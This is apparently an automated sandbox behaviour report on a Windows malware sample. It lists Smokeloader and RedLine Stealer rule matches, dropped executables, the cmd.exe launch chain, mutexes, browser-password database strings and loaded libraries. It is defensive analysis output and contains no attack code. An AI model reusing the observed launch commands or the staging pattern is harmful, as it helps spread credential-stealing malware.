Source: 00000000.00000002.2382402163.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.2765545970.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.3056076605.00000000025B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.3056668030.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: Section: ZLIB complexity 1.0000533640710383
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: Section: cwtgiuyn ZLIB complexity 0.9942648984781278
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 1.0000533640710383
Source: explorti.exe.5.dr Static PE information: Section: cwtgiuyn ZLIB complexity 0.9942648984781278
Source: axplong.exe.8.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: axplong.exe.8.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@48/55@23/10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C607030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H6P4REFQ.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1816
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8016
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2764
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: firefox.exe, 0000001E.00000002.3052198523.00000270DA3AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE database( name TEXT PRIMARY KEY, origin TEXT NOT NULL, version INTEGER NOT NULL DEFAULT 0, last_vacuum_time INTEGER NOT NULL DEFAULT 0, last_analyze_time INTEGER NOT NULL DEFAULT 0, last_vacuum_size INTEGER NOT NULL DEFAULT 0) WITHOUT ROWID0;
Source: file.exe, file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2085082126.0000000002566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084690109.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072848945.0000000022C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 40%
Source: RoamingCFCGIIEHIE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: userAKKKFBGDHJ.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 2376
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 1048
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1040
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02178454-e4c2-415f-b68b-05bee77a99df} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270c9b6d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1316 -parentBuildID 20230927232528 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {289cd873-04d9-4964-ab61-b0224a3875ef} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270dcbf3310 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 1028
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8056b53a-6eb2-4492-b78e-15b0c58ed1fc} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 2773686c110 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02178454-e4c2-415f-b68b-05bee77a99df} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270c9b6d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1316 -parentBuildID 20230927232528 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {289cd873-04d9-4964-ab61-b0224a3875ef} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270dcbf3310 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8056b53a-6eb2-4492-b78e-15b0c58ed1fc} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 2773686c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: apphelp.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: winmm.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wininet.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: sspicli.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: uxtheme.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: mstask.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.storage.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wldp.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: mpr.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: dui70.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: duser.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: chartv.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: oleacc.dll
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: atlthunk.dll
